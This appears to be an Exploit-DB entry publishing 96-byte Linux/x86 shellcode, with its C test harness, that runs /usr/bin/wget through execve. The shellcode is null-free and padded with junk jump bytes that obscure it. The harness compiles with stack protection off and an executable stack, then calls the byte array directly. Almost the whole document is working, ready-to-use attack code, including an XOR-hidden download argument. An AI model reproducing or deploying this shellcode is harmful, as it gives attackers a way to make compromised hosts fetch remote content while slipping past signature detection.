Linux/x86 - execve wget + Mutated + Null-Free Shellcode (96 bytes)

EDB-ID:

43739

CVE:

N/A


Platform:

Linux_x86

Published:

2013-01-01

/*

   Mutated Execve Wget Shellcode - C Language - Linux/x86
   Copyright (C) 2013 Geyslan G. Bem, Hacking bits

   http://hackingbits.com
   geyslan@gmail.com

   This program is free software: you can redistribute it and/or modify
   it under the terms of the GNU General Public License as published by
   the Free Software Foundation, either version 3 of the License, or
   (at your option) any later version.

   This program is distributed in the hope that it will be useful,
   but WITHOUT ANY WARRANTY; without even the implied warranty of
   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
   GNU General Public License for more details.

   You should have received a copy of the GNU General Public License
   along with this program.  If not, see <http://www.gnu.org/licenses/>.

*/

/*

   mutated_execve_wget_shellcode

   * 96 bytes
   * null-free
   * mutated isn't polymorphic (shellcode does not replicate itself to be called polymorphic)


  # gcc -m32 -fno-stack-protector -z execstack mutated_execve_wget_shellcode.c -o mutated_execve_wget_shellcode

  Testing
  # ./mutated_execve_wget_shellcode

*/


#include <stdio.h>
#include <string.h>

unsigned char shellcode[] = \

              "\xeb\x01\xe8\x29\xdb\x74\x01\x83\xf7\xe3"
              "\xbd\xf5\xff\xff\xff\xeb\x01\xe8\x68\x41"
              "\x65\x45\x72\x29\xf6\x74\x01\x83\x5e\x56"
              "\x81\xf6\x25\x4a\x1f\x3e\x56\xeb\x01\x33"
              "\x68\x69\x73\x2e\x67\x89\x44\x24\x0c\x89"
              "\xe1\x6a\x74\xeb\x01\xe3\x68\x2f\x77\x67"
              "\x65\xeb\x01\x83\x68\x2f\x62\x69\x6e\xeb"
              "\x01\x33\x68\x2f\x75\x73\x72\x8d\x1c\x24"
              "\xeb\x01\x83\x50\x51\x53\x89\xe1\xf7\xdd"
              "\x95\xeb\x01\x83\xcd\x80";


main ()
{

    // When contains null bytes, printf will show a wrong shellcode length.

    printf("Shellcode Length:  %d\n", strlen(shellcode));

    // Pollutes all registers ensuring that the shellcode runs in any circumstance.

    __asm__ ("movl $0xffffffff, %eax\n\t"
            "movl %eax, %ebx\n\t"
            "movl %eax, %ecx\n\t"
            "movl %eax, %edx\n\t"
            "movl %eax, %esi\n\t"
            "movl %eax, %edi\n\t"
            "movl %eax, %ebp\n\t"

            // Calling the shellcode
            "call shellcode");

}